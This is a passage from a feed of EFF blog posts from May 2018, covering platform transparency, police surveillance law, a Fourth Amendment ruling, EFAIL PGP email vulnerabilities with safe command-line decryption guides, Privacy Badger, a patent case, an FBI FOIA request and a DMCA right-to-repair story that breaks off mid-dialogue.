requires the nuanced eye of a human moderator. It’s a good thing that the company isn’t relying on technology here. What's not-so-good Although Facebook’s content enforcement report offers an unprecedented look into how the company adjudicates certain types of content, there’s still much to be desired. The Santa Clara Principles offer guidance on other details that free speech advocates would like to see reported, such as the source of flagging (i.e., governments, users, trusted flaggers, and different types of automated systems). Second, the report deals well with how the company deals with content that violates the rules, but fails to address how the company’s moderators and automated systems can get the rules wrong, taking down content that doesn’t actually violate the Community Standards. Now that Facebook has begun offering appeals, its next report could set a new standard by also including the number of appeals that resulted in content being restored. The report repeatedly refers to the company taking “action,” but only clarifies what that means in a separate document linked from the report (for the record, it’s a little better than it sounds: “taking action” might mean removing the content, disabling the account or merely covering content with a warning). Furthermore, while the introduction to the report states that it will address how quickly the company takes action on a given item, it doesn’t really do that, at least not in measure of time. Instead, that metric seems to refer to Facebook identifying and flagging content before users do, and even this metric is "not yet available." Savvy readers will notice that in the report, Facebook conflates violations of their “authentic identity” rule with impersonation and other fake accounts. While they note that “[b]ad actors try to create fake accounts in large volumes automatically using scripts or bots,” it would be useful to understand how many users are still being kicked off the service for more benign violations of the company’s “authentic identity” policy, such as using a partial name, a performance name, or another persistent pseudonym. Finally, transparency isn’t just about reports. Facebook still must become more accountable to its users, notifying them clearly when they violate a rule and demonstrating which rule was violated. Overall, Facebook’s report (and YouTube’s before it) is a step in the right direction, but advocates should continue to demand more.  
>> mehr lesen

California Bill Would Allow Elected Officials to Regulate and Veto Police Use of Military Spy Tech (Di, 15 Mai 2018)
In recent years, protesters have come face to face with police forces that are increasingly well-equipped with battlefield surveillance technologies. That’s because U.S. police are getting more and more equipment from the U.S. military—including sophisticated surveillance equipment. The trend has led to disturbing scenes like those from 2014 protests against police shootings, in which peaceful protesters were confronted by law enforcement equipped with sophisticated military equipment. In California, a bill is moving forward that would rein in those acquisitions of military equipment, and restore frayed relationships between police and the communities they serve. A.B. 3131 would allow police to acquire military equipment only after the acquisition is approved by a relevant elected legislative body, with opportunity for public comment required. Typically, the governing body for a law enforcement agency will be a city council or county board of supervisors. These officials would also need to evaluate the threat to civil liberties posed by the technology, and create a use policy that is legally enforceable. According to recent data from the Department of Defense, California police agencies are already in possession of more than $136 million worth of military equipment, including thermal imaging equipment, drones, and “long-range acoustic devices,” which are a type of sonic weapon. The Obama administration placed restrictions on handouts of military equipment in 2015, but those limits were removed by the Trump administration last year. Community oversight is critical to responsible use of any surveillance technology, and that’s especially true of tools powerful enough to be used in a military setting. That’s why EFF is supporting A.B. 3131. “All too often, government officials unilaterally decide to adopt powerful new military and surveillance technologies that invade our privacy, chill our free speech, and unfairly burden communities of color,” explained Nathan Sheard, EFF Grassroots Organizer, in our letter [PDF] supporting the bill. We’d like California legislators to go even further, and insist on oversight for all police purchases of spying equipment. Another California bill we supported last year would have required this. So does a bill we support this year:  S.B. 1186. Spying tools used against foreign military adversaries shouldn’t be casually handed over to U.S. police. Once these tools are adopted locally, it’s hard to stop their use. It’s time to pass A.B. 3131 and other proposals that will put a stop to unchecked police surveillance.
>> mehr lesen

The Supreme Court Says Your Expectation of Privacy Probably Shouldn’t Depend on Fine Print (Di, 15 Mai 2018)
The Supreme Court unanimously ruled yesterday in Byrd v. United States that the driver of a rental car could have a reasonable expectation of privacy in the car even though the rental agreement did not authorize him to drive it. We’re pleased that that the Court refused to let a private contract dictate Fourth Amendment rights in this case, and we hope it’s instructive to other courts, particularly those confronted with the argument that terms of service undermine users’ expectation of privacy in third party email.  What Determines an Expectation of Privacy?  In Byrd, state troopers stopped Terrence Byrd while he was driving a rental car alone on a Pennsylvania interstate. Once the troopers realized he was not an authorized driver, they went ahead and searched the car, finding body armor and 49 bricks of heroin in the trunk. Byrd challenged the search on Fourth Amendment grounds, but both lower courts ruled that he did not have a Fourth Amendment interest in a car that he was not authorized by the rental company to drive. The Supreme Court disagreed.  The Court explained that as in any Fourth Amendment case, the starting point is to determine whether the individual has demonstrated a “reasonable expectation of privacy” in the place searched. Determining exactly what makes an expectation of privacy reasonable is notoriously difficult, but according to a 1978 case it “must have a source outside of the Fourth Amendment, either by reference to concepts of real or personal property law or to understandings that are recognized and permitted by society.” When it comes to places like houses and cars, the Court has developed a kind of sliding scale: owners and those in lawful possession (like tenants) “almost always” have a reasonable expectation of privacy, while short-term visitors do not. On the one hand, it’s not enough to simply happen to be somewhere in order to contest a search, but you don’t have to have a strict property interest in the place either, since overnight guests can contest a police search.   Byrd falls somewhere in the middle of this sliding scale. The Court compared him to the defendant in a 1960 case called Jones v. United States—not to be confused with the 2012 Jones case regarding GPS tracking—in which the defendant was staying alone in an apartment rented by his friend and was allowed to contest an illegal search by the police. In both cases, the defendants were the sole occupants of the place searched, so they had “dominion and control” and the “right to exclude” others from it. In light of this, Justice Kennedy wrote that there was “no reason” that an expectation of privacy should depend on “whether the car in question is rented or privately owned by someone other than the person in current possession of it.” As a result, the Court remanded for a determination of exactly whether Byrd’s possession of the car was lawful or whether he had a friend rent it as an illegal pretext.   Your Fourth Amendment Rights Shouldn’t Come with Terms and Conditions Perhaps the more interesting question in the case, however, was whether the Budget Rent a Car agreement that Byrd’s friend signed before giving him the keys should have negated Byrd’s expectation of privacy in the car. That agreement provided in capital letters that permitting an unauthorized driver to drive the car was a violation of the rental contract that could void its coverage. The government argued that this provision automatically nullified Byrd’s expectation of privacy in the car. Thankfully, the Supreme Court refused to go down this road. “As anyone who has rented a car knows, car-rental agreements are filled with long lists of restrictions,” including things like “driving the car on unpaved roads or driving while using a handheld cellphone. Few would contend that violating provisions like these has anything to do with a driver’s reasonable expectation of privacy in the rental car.” There might even be “innocuous” reasons to do something that voids the agreement, like allowing an unauthorized driver, such as when the official renter is too drunk to drive. At the end of the day, the Court wrote, rental agreements concern “risk allocation between private parties,” not someone’s expectation of privacy. This is an encouraging result, especially because we’ve seen the government argue that private contracts—specifically email providers’ terms of service—should inform users’ expectations of privacy. In a case currently in front of the Tenth Circuit Court of Appeals, United States v. Ackerman, in which EFF recently filed an amicus brief, the district court held that when AOL terminated the defendant’s account pursuant to its TOS, it extinguished his expectation of privacy. In fact, the court wrote that the TOS itself “limited his expectation of privacy” because it “alerted Defendant that he was not to participate or engage in illegal activity.”  As we argued in Ackerman, terms of service should not determine expectations of privacy for the very reason that Justice Kennedy pointed to in Byrd—they are fundamentally contracts (of adhesion) between private parties, not the sort of thing that should dictate our privacy in relation to the government. As in rental car agreements, email providers’ TOS nearly always prohibit a wide range of behavior and allow the provider to unilaterally void the agreement. But just as with mail and telephone service, millions of Americans rely on the privacy of email and electronic communications even though they are facilitated by intermediaries, and the Fourth Amendment indisputably protects these communications. While the Fourth Amendment’s application to email and the Internet cannot be mechanically compared to the law of traffic stops and apartment searches, we hope that other courts follow the Supreme Court’s firm rejection of the government’s terms-and-conditions-may-apply arguments in Byrd.
>> mehr lesen

Pretty Good Procedures for Protecting Your Email (Di, 15 Mai 2018)
A group of researchers recently released a paper that describes a new class of serious vulnerabilities in the popular encryption standard PGP (including GPG) as implemented in email clients. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email. See EFF’s analysis and FAQ for more detail. Our current recommendation is to disable PGP integration in email clients. This is the number one thing you can do to protect your past messages, and prevent future messages that you receive from being read by an attacker. You should also encourage your contacts to do the same. Disabling PGP integration for Thunderbird Disabling PGP integration for Apple Mail Disabling PGP integration for Outlook If you have old emails you need to access, the next thing you can do is save old emails to be decrypted on the command line. Exporting PGP-encrypted email from Thunderbird Exporting PGP-encrypted email from Apple Mail Exporting PGP-encrypted email from Outlook Methods for reading encrypted email on the command line vary between operating systems, so separate instructions are needed. The instructions linked above for disabling the plugin from your mail client leave your PGP keyring in place, so you will use the same passphrase when prompted. Using the command line to decrypt a message for Windows Using the command line to decrypt a message for macOS Using the command line to decrypt a message for Linux
>> mehr lesen

Using the Command Line to Decrypt a Message on Linux (Di, 15 Mai 2018)
If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL. Note that the first three steps (opening the terminal) will vary between desktop environments. Open the Activities view by clicking all the way in the top left corner of your screen. 2. Type “terminal” into the search bar, and press Enter. This will open the command prompt. 3. Type “cd Desktop” to go to your desktop. Mind the capital ‘D’! 4. Type “gpg -d encrypted.eml” using the name of the file you saved earlier. This may prompt you for your PGP passphrase depending on your configuration and recent usage, and will output the full email in the terminal window. These notes are based on Ubuntu Desktop with GNOME 3.  
>> mehr lesen

PGP and EFAIL: Frequently Asked Questions (Di, 15 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email, and theorized many more which others could build upon. For users who have few—or even no—alternatives for end-to-end encryption, news of these vulnerabilities may leave many questions unanswered. Digital security trainers, whistleblowers, journalists, activists, cryptographers, industry, and nonprofit organizations have relied on PGP for 27 years as a way to protect email communications from eavesdroppers and ensure the authenticity of messages. If you’re like us, you likely have recommended PGP as an end-to-end encrypted email solution in workshops, trainings, guides, cryptoparties, and keysigning parties. It can be hard to imagine a workflow without PGP once you’ve taken the time to learn it and incorporate it in your communications. We’ve attempted to answer some important questions about the current state of PGP email security below. Who is affected, and why should I care? Is disabling HTML sufficient? I use software that is verified with a PGP signature. Can it be trusted? What are the vulnerabilities? What does the paper say about my email client? But I use [insert email software here] and it’s not on the affected list. Should I care? Does this mean PGP is broken? What should I do about PGP software on my computer? Can my previous emails be read by an attacker? What if I keep getting PGP emails? Going forward, what should I look out for? Is there a replacement for sending end-to-end encrypted messages? I don’t have other end-to-end encrypted messaging options available. PGP is my only option. Can I still use it? I don’t want to use the command line. Surely there’s a usable alternative. Can’t you recommend something else? I only use PGP in the command line. Am I affected? Who is affected, and why should I care? Since PGP is used as a communication tool, sending messages to others with unpatched clients puts your messages at risk, too. Sending PGP messages to others also increases the risk that they will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them. Balancing the risks of continuing to use PGP can be tricky, and will depend heavily on your own situation and that of your contacts. Is disabling HTML sufficient? Turning off sending HTML email will not prevent this attack. For some published attacks, turning off viewing HTML email may protect your messages being leaked to an attacker by you. However, since PGP email is encrypted to both the sender and each recipient, it will not protect these messages from being leaked by anyone else you’ve communicated with. Additionally, turning off HTML email may not protect these messages against future attacks that are discovered which build off of the current vulnerabilities. Turning off reading HTML email while still sending PGP-encrypted messages encourages others to read these with their own potentially vulnerable clients. This promotes an ecosystem that puts the contents of these messages (as well as any past messages that are decrypted by them) at risk. I use software that is verified with a PGP signature. Can it be trusted? Yes! Verifying software signed with PGP is not vulnerable to this class of attack. Package management systems enforcing signature verification (like some distributions of Linux do) are also unaffected. What are the vulnerabilities? There are two attacks of concern demonstrated by the researchers: 1. “Direct exfiltration” attack: This takes advantage of the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. 2. Ciphertext modification attack: The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously obtained encrypted email. This second vulnerability takes advantage of the combination of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check does not check out. Since the OpenPGP standard did not specify what to do if the integrity check does not check out, some software incorrectly displays the message anyway, enabling this attack. Furthermore, this style of attack, if paired with an exfiltration channel appropriate to the context, may not be limited to the context of HTML-formatted email. We have more detail about the specifics of the vulnerabilities and details on mitigations. What does the paper say about my email client? Some email clients are impacted more than others, and the teams behind those clients are actively working on mitigating the risks presented. The paper describes both direct exfiltration (table 4, page 11) and backchannels (table 5, page 20) for major email clients. Even if your client has patched current vulnerabilities, new attacks may follow. But I use [insert email software here] and it’s not on the affected list. Should I care? While you may not be directly affected, the other participants in your encrypted conversations may be. For this attack, it isn’t important whether the sender or any receiver of the original secret message is targeted. This is because a PGP message is encrypted to each of their keys. Sending PGP messages to others also increases the risk that your recipients will turn to a vulnerable client to decrypt these messages. Until enough clients are reliably patched, sending PGP-encrypted messages can create adverse ecosystem incentives for others to decrypt them. Does this mean PGP is broken? The weaknesses in the underlying OpenPGP standard (specifically, OpenPGP’s lack of mandatory integrity verification) enable one of the attacks given in the paper. Despite its pre-existing weaknesses, OpenPGP can still be used reliably within certain constraints. When using PGP to encrypt or decrypt files at rest, or to verify software with strict signature checking, PGP still behaves according to expectation. OpenPGP also uses underlying cryptographic primitives such as SHA-1 which are no longer considered safe and lacks the benefits of Authenticated Encryption (AE), and signatures can be trivially stripped from messages. In time, newer standards will have to be developed which address these more fundamental problems in the specification. Unfortunately, introducing fixes to introduce authenticated encryption without also rotating keys to strictly enforce usage constraints will make OpenPGP susceptible to backwards-compatibility attacks. This will have to be addressed in any future standard. In short, OpenPGP can be trusted to a certain degree. For long-term security of sensitive communications, we suggest you migrate to another end-to-end encrypted platform. What should I do about PGP software on my computer? In general, keeping PGP (or GPG) on your system should be safe from the known exploits, provided that it is disconnected from email as described above. Some Linux systems depend on GPG for software verification, and PGP is still useful for manually verifying software. Uninstalling your PGP software may make your keys inaccessible and prevent you from decrypting past messages in some instances, as well. Can my previous emails be read by an attacker? If the PGP-encrypted contents of previous emails are sent to you in new emails using this attack and you open that email in an unpatched email client with PGP software enabled, then yes. For viewing your archive of encrypted emails, we recommend using the command line. What if I keep getting PGP emails? You can decrypt these emails via the command line. If you prefer not to, notify your contacts that PGP is, for the time being, no longer safe to use in email clients and decide whether the conversation can continue over another end-to-end encrypted platform, such as Signal. Going forward, what should I look out for? We will be following this issue closely in the coming weeks. Authors of email clients and PGP plugins are working actively to patch this vulnerability, so you should expect updates forthcoming. For the latest updates, you can follow https://sec.eff.org/blog or https://www.eff.org/issues/security. Is there a replacement for sending end-to-end encrypted messages? There is no secure, vetted replacement for PGP in email. There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives. I don’t have other end-to-end encrypted messaging options available. PGP is my only option. Can I still use it? Unfortunately, we cannot recommend using PGP in email clients until they have been patched, both on your device and your recipient’s device. The timeline for these patches varies from client to client. We recommend disconnecting PGP from your email client until the appropriate mitigations have been released. Stay tuned to https://sec.eff.org/blog or https://www.eff.org/issues/security for more info. I don’t want to use the command line. Surely there’s a usable alternative. Can’t you recommend something else? It’s very difficult to assess new software configurations in such a short timeframe. Some email clients are more vulnerable to this attack than others. However, using these email clients can have the effect of putting others at risk. We suggest decrypting archived emails with the command line, and moving to another end-to-end platform for conversations, at least until we are confident that the PGP email ecosystem has been restored to its previous level of security. I only use PGP in the command line. Am I affected? Yes and no. As we currently understand, if you are using PGP solely for file encryption, without email, there are no known exfiltration channels to send the file contents to an attacker. However, the contents may still have been modified in transit in a way that you won’t necessarily be able to see, depending on how the implementer of the specific PGP software chose to do things. This is due to the integrity downgrade aspect of the vulnerability. Additionally, if you are using PGP to encrypt a message sent over email and your recipient uses a vulnerable email client, your correspondences are at risk of decryption. As it’s likely that many people use an email client to access PGP-encrypted emails, it’s important to clarify with your recipients that they have also disabled PGP in their email clients, or are using an unaffected client. If you must continue sensitive correspondences, we highly recommend switching to a vetted end-to-end encryption tool.
>> mehr lesen

Using the Command Line to Decrypt a Message on Windows (Di, 15 Mai 2018)
If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL. 1. Open the start menu by clicking the “Windows” icon in the bottom-left corner of the screen or pressing the “Windows” key on your keyboard. 2. Next, type “cmd” in the start menu that appears, and then the “enter” key. 3. You will now see a “Command Prompt” window appear. 4. Type exactly “cd Desktop”, then hit the “Enter” key. 5. Type the following text exactly: “gpg -d encrypted.eml”, then hit the “Enter” key. Outlook users should type exactly “gpg -d encrypted.asc” instead. 6. You will now be prompted to enter your GPG passphrase. Type it into the dialog, which may look different for Enigmail users, then hit the “Enter” key. 7. You should now see the contents of the message in the Command Prompt window. These notes are based on Windows 10 with Gpg4win.
>> mehr lesen

Using the Command Line to Decrypt a Message on macOS (Di, 15 Mai 2018)
If you have disabled the PGP plugin from your mail client and saved a copy of an encrypted email to your desktop, this guide will help you read that message in as safe a way as possible given what we know about the vulnerability described by EFAIL. 1. Open Finder (the blue smiley face icon) from the dock.          2. Click Applications on the left side of the window. 3. Scroll down and double-click the Utilities folder.   4. Double-click Terminal to open the command line.   5. Type “cd Desktop” and hit enter to go to your desktop. Mind the capital ‘D’!     6.Type “gpg -d encrypted.eml”. (Note, if you named your file something else, you can swap it with the “encrypted.eml” text. Be mindful of capitalization and spelling!) 7. This will prompt you for your PGP passphrase and output the full email in the terminal window. Note that attachments and emoji will not render using this method, and it will be in plaintext. Email headers will be visible, as well as the PGP signature.  
>> mehr lesen

Exporting PGP-Encrypted Email From Outlook (Di, 15 Mai 2018)
After disabling the GpgOL plugin, you will need to save encrypted messages as files on your hard drive in order to view them later on. 1. Select the encrypted message. 2. Right-click the file ending in “.asc”, then click “Save As.” 3. Click on “Desktop” to choose where you will save the file. Type “encrypted” for the filename, and click “Save.” For certain older PGP messages (PGP Inline), you will not see files to download. These steps may have to be altered for those messages. For instructions on reading the saved file, see Using the Command Line to Decrypt a Message on Windows. These notes are based on Outlook 2016 and Windows 10.
>> mehr lesen

Exporting PGP-Encrypted Email From Apple Mail (Di, 15 Mai 2018)
After disabling the GPGTools plugin for Apple Mail, you will need to save encrypted messages as files on your hard drive in order to view them later o 1. Select the encrypted message. (Note: If you have followed the instructions for how to disable GPG in Apple Mail correctly, you will see something like the below image, instead of seeing the email with a note that it was decrypted.) 2. Click the “View” menu in the menu bar on the top of the screen, and select “Message”, and then select “Raw Source.” 3. The Raw Source of the email will open in a new window. You will be able to see the email headers, as well as the encrypted message. The full encrypted message will be bookended by “-----BEGIN PGP MESSAGE-----” and “-----END PGP MESSAGE-----”. This whole block, from first hyphen before BEGIN and to the last hyphen after END, is the encrypted message.     4. To save this email as a file, Click the “File” menu in the menu bar on the top of the screen, and select “Save As...”   5. Select Desktop in the “Where” drop-down to make it easier to follow along. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make it easier to follow along with our command-line reading tutorial.   6. Once you hit “Save”, the file should appear on your Desktop as selected in. (Note: Your macOS Desktop may hide the file extension. The file extension is: “.eml”.)   For instructions on reading the saved .eml file, see Using the Command Line to Decrypt a Message on MacOS.
>> mehr lesen

Exporting PGP-Encrypted Email From Thunderbird (Di, 15 Mai 2018)
After disabling Enigmail, you will need to save encrypted messages as files on your hard drive in order to view them later on. These instructions will work on most desktop operating systems. 1. Select the encrypted message. 2. Click on the hamburger menu (the three horizontal lines). 3. Hover over “Save As” on the left side of the menu pop-up. 4. Click on “File.” 5. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make the command-line step easier. 6. You can place this anywhere on your hard drive that makes the most sense to you, but to simplify following along in our command-line decryption tutorials, we suggest saving on the Desktop. For instructions on reading the saved .eml file, follow the link below that matches your operating system. How to read PGP-encrypted email on the command line: Windows macOS Linux
>> mehr lesen

Privacy Badger Rolls Out New Ways to Fight Facebook Tracking (Di, 15 Mai 2018)
On Thursday, EFF released a new version of Privacy Badger featuring a new, experimental way to protect your privacy on—and crucially, off—Facebook. It specifically targets link tracking, Facebook’s practice of following you whenever you click on a link to leave facebook.com. Download Privacy Badger What is link tracking? Say your friend shares an article from EFF’s website on Facebook, and you’re interested. You click on the hyperlink, your browser opens a new tab, and Facebook is no longer a part of the equation. Right? Not exactly. Facebook—and many other companies, including Google and Twitter—use a variation of a technique called link shimming to track the links you click on their sites. When your friend posts a link to eff.org on Facebook, the website will “wrap” it in a URL that actually points to facebook.com: something like https://l.facebook.com/l.php?u=https%3A%2F%2Feff.org%2Fpb&h=ATPY93_4krP8Xwq6wg9XMEo_JHFVAh95wWm5awfXqrCAMQSH1TaWX6znA4wvKX8pNIHbWj3nW7M4F-ZGv3yyjHB_vRMRfq4_BgXDIcGEhwYvFgE7prU. This is a link shim. When you click on that monstrosity, your browser first makes a request to Facebook with information about who you are, where you are coming from, and where you are navigating to. Then, Facebook quickly redirects you to the place you actually wanted to go. That’s just how basic link shimming works. Facebook’s approach is a bit sneakier. When the site first loads in your browser, all normal URLs are replaced with their l.facebook.com shim equivalents. But as soon as you hover over a URL, a piece of code triggers that replaces the link shim with the actual link you wanted to see: that way, when you hover over a link, it looks innocuous. The link shim is stored in an invisible HTML attribute behind the scenes. Tracking link replacement on hover When you hover over a link shim, Facebook hides the tracking URL in an HTML attribute behind the scenes. The new link takes you to where you want to go, but when you click on it, another piece of code fires off a request to l.facebook.com in the background—tracking you just the same. Privacy Badger to the rescue To combat this, the latest version of Privacy Badger finds all new link shims as they’re added to the page, replaces them with their "unwrapped" equivalents, and blocks the tracking code that would run when you hover over or click on them. We owe special thanks to Michael Ziminsky, whose code for the extension Facebook Tracking & Ad Removal formed the basis for this feature. Privacy Badger already blocks third-party trackers. But Facebook performs a tremendous amount of first-party tracking as well—logging your browsing habits when you’re on facebook.com or using their mobile app. Some of that is consensual. When you decide to “like” a post or leave a comment, you are voluntarily sharing information with Facebook and with your friends. Facebook has legitimate uses for that information that serve you, the user. But much of it, like link tracking, happens without your knowledge or consent. That’s where we hope Privacy Badger can make a difference. According to Facebook's official post on the subject, in addition to helping Facebook track you, link shims are intended to protect users from links that are "spammy or malicious." The post states that Facebook can use click-time detection to save users from visiting malicious sites. However, since we found that link shims are replaced with their unwrapped equivalents before you have a chance to click on them, Facebook's system can't actually protect you in the way they describe. Facebook also claims that link shims "protect privacy" by obfuscating the HTTP Referer header. With this update, Privacy Badger removes the Referer header from links on facebook.com altogether, protecting your privacy even more than Facebook's system claimed to. Privacy Badger has been performing link unwrapping on Twitter, which uses “t.co/...” shim links, for some time. And Privacy Badger already blocks many of the ways Facebook tracks you around the web, including "like" buttons and third-party cookies. More to come This update is our first foray into blocking first-party trackers on Facebook. Moving forward, we’ve noticed that some tracking still occurs in Firefox when users click on links with the middle and right mouse buttons. And we’ve just scratched the surface of the behind-the-scenes tracking Facebook actually does. In the coming months, we’ll continue investigating the kinds of tracking that Facebook, Google, Twitter, and others do on their own sites to see where it makes sense for Privacy Badger to get involved. We’ll keep you updated on our progress. In the meantime, if you’re a developer and would like to help, check us out on Github. And if you haven’t yet, be sure to install Privacy Badger!
>> mehr lesen

EFF Wins Final Victory Over Podcasting Patent (Mo, 14 Mai 2018)
Back in early 2013, the podcasting community was freaking out. A patent troll called Personal Audio LLC had sued comedian Adam Carolla and was threatening a bunch of smaller podcasters. Personal Audio claimed that the podcasters infringed U.S. Patent 8,112,504, which claims a “system for disseminating media content” in serialized episodes. EFF challenged the podcasting patent at the Patent Office in October 2013. We won that proceeding, and it was affirmed on appeal. Today, the Supreme Court rejected Personal Audio’s petition for review. The case is finally over. We won this victory with the support of our community. More than one thousand people donated to EFF’s Save Podcasting campaign. We also asked the public to help us find prior art. We filed an inter partes review (IPR) petition that showed Personal Audio did not invent anything new, and that other people were podcasting years before Personal Audio first applied for a patent. Meanwhile, Adam Carolla fought Personal Audio in federal court in the Eastern District of Texas. He also raised money for his defense and was eventually able to convince Personal Audio to walk away. When the settlement was announced, Personal Audio suggested that it would no longer sue small podcasters. That gave podcasters some comfort. But the settlement did not invalidate the patent. In April 2015, EFF won at the Patent Office. The Patent Trial and Appeal Board (PTAB) invalidated all the challenged claims of the podcasting patent, finding that it should not have been issued in light of two earlier publications, one relating to CNN news clips and one relating to CBC online radio broadcasting. Personal Audio appealed that decision to the Federal Circuit. The podcasting patent expired in October 2016, while the case was on appeal before the Federal Circuit. But that wouldn’t save podcasters who were active before the patent expired. The statute of limitations in patent cases is six years. If it could salvage its patent claims, Personal Audio could still sue for damages for years of podcasting done before the patent expired. On August 7, 2017, the Federal Circuit affirmed the PTAB’s ruling invalidating all challenged claims. After this defeat, Personal Audio tried to get the Supreme Court to take its case. It argued that the IPR process is unconstitutional, raising arguments identical to those presented in the Oil States case. The Supreme Court rejected those arguments in its Oil States decision, issued last month. Personal Audio also argued that EFF should be bound by a jury verdict in a case between Personal Audio and CBS—an argument which made no sense, because that case involved different prior art and EFF was not a party. Today, the Supreme Court issued an order denying Personal Audio’s petition for certiorari. With that ruling, the PTAB’s decision is now final and the patent claims Personal Audio asserted against podcasters are no longer valid. We thank everyone who supported EFF’s Save Podcasting campaign.  Related Cases:  EFF v. Personal Audio LLC
>> mehr lesen

The FBI Supposedly Has 7,775 Un-hackable Phones. We’re Asking for Proof (Mo, 14 Mai 2018)
EFF sent a Freedom of Information Act (FOIA) request to the FBI and other Department of Justice agencies to get some straight answers about approximately 7,800 supposedly un-hackable cellphones. Law enforcement agencies say they have a problem–criminals all use encrypted devices, making those devices inaccessible to law enforcement. They call this the “Going Dark” problem, saying that modern encryption is so good that all the criminals in the world are “going dark” to government surveillance. To stop this, these agencies are clamoring for laws that would mandate backdoors be placed in encryption algorithms that allow for law enforcement access. EFF is very concerned about these efforts to introduce backdoors into encryption, because as we’ve said, there’s no such thing as a safe backdoor. Any backdoor in encryption can be just as easily used by bad actors as by law enforcement if it gets leaked, and once a hard-coded backdoor is discovered, it often can’t be closed. Nevertheless, law enforcement agencies leaders continue to argue that they will be helpless without these backdoors. In particular, FBI Director Christopher Wray has repeatedly [.pdf] claimed that the FBI failed to break the encryption of 7,775 mobile devices during the 2017 fiscal year. This number sure is interesting, since we know that the FBI was able to get into the iPhone of the San Bernardino shooter without forcing Apple to help them do it, and we know that companies like Cellebrite and Grayshift sell access to iPhones for a few thousand dollars each. If these companies are actively providing their products to law enforcement, and have been doing so for years, where does Wray find 7,775 devices the FBI cannot hack? To find out, we have submitted a FOIA request to the FBI, as well as the Offices of the Inspector General and Information Policy at DoJ. Among other things, we are asking the FBI to tell the public how they arrived at that 7,775 devices figure, when and how the FBI discovered that some outside entity was capable of hacking the San Bernardino iPhone, and what the FBI was telling Congress about its capabilities to hack into cellphones. When law enforcement argues for legally mandating encryption backdoors into our devices, and justifies that argument by claiming they can’t get in any other way, it’s important for legislators and the public to know whether that justification is actually true.
>> mehr lesen

EFF Presents John Scalzi's Science Fiction Story About Our Right to Repair Petition to the Copyright Office (Mo, 14 Mai 2018)
Section 1201 of the Digital Millennium Copyright Act (DMCA 1201) makes it illegal to get around any sort of lock that controls access to copyrighted material. Getting exemptions to that prohibitions is a long, complicated process that often results in long, complicated exemptions that are difficult to use. As part of our ongoing to effort to fight this law, we're presenting a series of science fiction stories to illustrate the bad effects DMCA 1201 could have. It's been 20 years since Congress adopted Section 1201 of the DMCA, one of the ugliest mistakes in the crowded field of bad ideas about computer regulation. Thanks to Section 1201 if a computer has a lock to control access to a copyrighted work, then getting around that lock, for any reason is illegal. In practice, this has meant that a manufacturer can make the legitimate, customary things you do with your own property, in your own home or workplace, illegal just by designing the products to include those digital locks. A small bit of good news: Congress designed a largely ornamental escape valve into this system: every three years, the Librarian of Congress can grant exemptions to the law for certain activities. These exemptions make those uses temporarily legal, but (here's the hilarious part), it's still not legal to make a tool to enable that use. It's as though Congress expected you to gnaw open your devices and manually change the software with the sensitive tips of your nimble fingers or something. That said, in many cases it's easy to download the tools you need anyway. We're suing the U.S. government to invalidate DMCA 1201, which would eliminate the whole farce. It's 2018, and that means it's exemptions time again! EFF and many of our allies have filed for a raft of exemptions to DMCA 1201 this year, and in this series, we're teaming up with some amazing science fiction writers to explain what's at stake in these requests. This week, we're discussing our right to repair exemption. Did you know the innards of your car are copyrighted? That's what the big auto manufacturers say, anyway. Since the dawn of the automotive industry, car owners could fix their cars themselves, or bring them to a mechanic of their choosing, from official, authorized mechanics to "shade-tree mechanics" who kept their motors going. But the auto industry says that once they added copyrighted software to their products, they could use copyright law to control who could fix them. All they have to do is design the engines so that the diagnostic information necessary to fix a car is scrambled, and then they get to invoke Section 1201 of the DMCA to anyone who descrambles that information without permission. They can even use this gimmick to design an engine that only accepts parts made by the original manufacturer—simply add a bit of software to do some cryptographic checking on the part's chips, and use DMCA 1201 threats to shut down anyone who makes a chip that can send the right codes to let you use someone else's part. The use of DRM to threaten the independent repair sector is a bad deal all-around. Repair is an onshore industry that creates middle-class jobs in local communities, where service technicians help Americans get more value out of the devices they buy. It's not just cars: everything from tractors to printers, from toys to thermostats have been designed with DRM that stands in the way of your ability to decide who fixes your stuff, or whether it can be fixed at all. That's why we've asked the Copyright Office to create a broad exemption to permit repair technicians to bypass any DRM that gets in the way of their ability to fix your stuff for you. Our friend John Scalzi was kind enough to write us a science fiction story that illustrates the stakes involved. Right to Repair, by John Scalzi “Winston Jones?” “That’s me.” “Hi, I’m Breanna, the mechanic that’s been looking at your car since it got towed in. Bad luck, that.” “Tell me about it. One minute I’m in the fast lane, the next I have to swerve all the way across the freeway to get to the shoulder before I get rammed by a semi.” “Well, glad you made out of there alive. It made it easier for our tow driver to get to you. So, Mr. Jones, I have some good news, and some less good news.” “What’s the good news?” “The good news is that the only thing wrong with your car is a snapped timing chain.” “That’s it?” “That’s it. And that’s lucky too. A snapped chain can do a lot of damage. But the rest of your engine looks clean.” “Well, hell. That’s the first piece of good news I’ve had all day. You have timing chains here?” “Yes, we do. But... well, Mr. Jones, that’s the less good news.” “What is it?” “We don’t have your specific car’s timing belt here.” “Is there something unusual about it?” “Not really. 